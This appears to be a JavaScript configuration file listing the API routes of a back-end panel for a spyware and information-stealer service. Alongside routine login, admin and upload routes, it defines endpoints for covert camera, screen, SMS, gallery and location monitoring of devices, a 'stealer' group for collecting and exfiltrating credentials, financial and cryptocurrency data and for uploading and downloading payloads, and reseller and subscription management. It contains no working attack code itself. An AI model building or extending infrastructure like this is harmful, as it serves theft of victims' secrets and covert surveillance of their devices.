const API_ENDPOINTS = {
  AUTH: {
    LOGIN: '/auth/login',
    LOGOUT: '/auth/logout',
    VERIFY: '/auth/verify',
    REFRESH: '/auth/refresh',
    CHANGE_PASSWORD: '/auth/change-password',
    FORGOT_PASSWORD: '/auth/forgot-password',
    RESET_PASSWORD: '/auth/reset-password'
  },
  DEVICES: {
    LIST: '/devices',
    DETAIL: '/devices/:id',
    CREATE: '/devices',
    UPDATE: '/devices/:id',
    DELETE: '/devices/:id',
    STATUS: '/devices/:id/status',
    LOCK: '/devices/:id/lock',
    UNLOCK: '/devices/:id/unlock',
    RESET: '/devices/:id/reset',
    LOST: '/devices/:id/lost',
    RECOVER: '/devices/:id/recover',
    GALLERY: '/devices/:id/gallery',
    SMS: '/devices/:id/sms',
    CAMERA: '/devices/:id/camera',
    CAMERA_START: '/devices/:id/camera/start',
    CAMERA_STOP: '/devices/:id/camera/stop',
    MONITOR: '/devices/:id/monitor',
    MONITOR_START: '/devices/:id/monitor/start',
    MONITOR_STOP: '/devices/:id/monitor/stop',
    STATS: '/devices/stats',
    DOWNLOAD_FILE: '/devices/files/:fileId/download',
    DELETE_FILE: '/devices/files/:fileId'
  },
  MONITORING: {
    LIVE: '/monitoring/live',
    CAMERA: '/monitoring/camera',
    SCREEN: '/monitoring/screen',
    LOCATION: '/monitoring/location',
    FILES: '/monitoring/files'
  },
  STEALER: {
    COLLECT: '/stealer/collect',
    CREDENTIALS: '/stealer/credentials',
    FINANCIAL: '/stealer/financial',
    CRYPTO: '/stealer/crypto',
    EXFILTRATE: '/stealer/exfiltrate',
    PAYLOAD: '/stealer/payload',
    PAYLOAD_DOWNLOAD: '/stealer/payload/download',
    PAYLOAD_UPLOAD: '/stealer/payload/upload',
    STATS: '/stealer/stats'
  },
  ADMIN: {
    USERS: '/admin/users',
    USER: '/admin/users/:id',
    USER_CREATE: '/admin/users',
    USER_UPDATE: '/admin/users/:id',
    USER_DELETE: '/admin/users/:id',
    USER_STATUS: '/admin/users/:id/status',
    USER_ROLE: '/admin/users/:id/role',
    RESELLERS: '/admin/resellers',
    RESELLER: '/admin/resellers/:id',
    RESELLER_CREATE: '/admin/resellers',
    RESELLER_UPDATE: '/admin/resellers/:id',
    RESELLER_DELETE: '/admin/resellers/:id',
    RESELLER_STATS: '/admin/resellers/stats',
    DEVICES: '/admin/devices',
    DEVICE: '/admin/devices/:id',
    DEVICE_DELETE: '/admin/devices/:id',
    STATS: '/admin/stats',
    ACTIVITIES: '/admin/activities',
    SETTINGS: '/admin/settings',
    SETTINGS_UPDATE: '/admin/settings/update',
    SYSTEM_HEALTH: '/admin/system/health',
    SYSTEM_LOGS: '/admin/system/logs',
    BACKUP: '/admin/backup',
    BACKUP_CREATE: '/admin/backup/create'
  },
  USER: {
    PROFILE: '/user/profile',
    PROFILE_UPDATE: '/user/profile/update',
    DEVICES: '/user/devices',
    DEVICE_ADD: '/user/devices/add',
    DEVICE_REMOVE: '/user/devices/:id/remove',
    SUBSCRIPTION: '/user/subscription',
    SUBSCRIPTION_UPGRADE: '/user/subscription/upgrade',
    HISTORY: '/user/history',
    NOTIFICATIONS: '/user/notifications',
    NOTIFICATION_READ: '/user/notifications/:id/read',
    SETTINGS: '/user/settings'
  },
  PIN: {
    GENERATE: '/pin/generate',
    VERIFY: '/pin/verify',
    GET: '/pin/:userId',
    RESET: '/pin/reset',
    REGENERATE: '/pin/regenerate',
    HISTORY: '/pin/history',
    STATUS: '/pin/status'
  },
  NOTIFICATIONS: {
    REGISTER_TOKEN: '/notifications/register-token',
    UNREGISTER_TOKEN: '/notifications/unregister-token',
    SEND: '/notifications/send',
    SEND_BULK: '/notifications/send-bulk',
    SEND_DEVICE: '/notifications/send-device',
    SEND_USER: '/notifications/send-user',
    TEMPLATES: '/notifications/templates',
    TEMPLATE_CREATE: '/notifications/templates',
    TEMPLATE_UPDATE: '/notifications/templates/:id',
    TEMPLATE_DELETE: '/notifications/templates/:id',
    HISTORY: '/notifications/history',
    STATS: '/notifications/stats',
    SCHEDULE: '/notifications/schedule'
  },
  WEBSOCKET: {
    CONNECT: '/ws/connect',
    SUBSCRIBE: '/ws/subscribe',
    UNSUBSCRIBE: '/ws/unsubscribe',
    DEVICE: '/ws/device',
    MONITOR: '/ws/monitor',
    CAMERA: '/ws/camera',
    SCREEN: '/ws/screen'
  },
  UPLOAD: {
    SINGLE: '/upload/single',
    MULTIPLE: '/upload/multiple',
    CHUNKED: '/upload/chunked',
    FILE: '/upload/file/:id',
    FILES: '/upload/files',
    DELETE: '/upload/delete/:id'
  },
  LOGS: {
    SYSTEM: '/logs/system',
    ACCESS: '/logs/access',
    ERROR: '/logs/error',
    ACTIVITY: '/logs/activity',
    DEVICE: '/logs/device',
    USER: '/logs/user'
  }
};

export default API_ENDPOINTS;
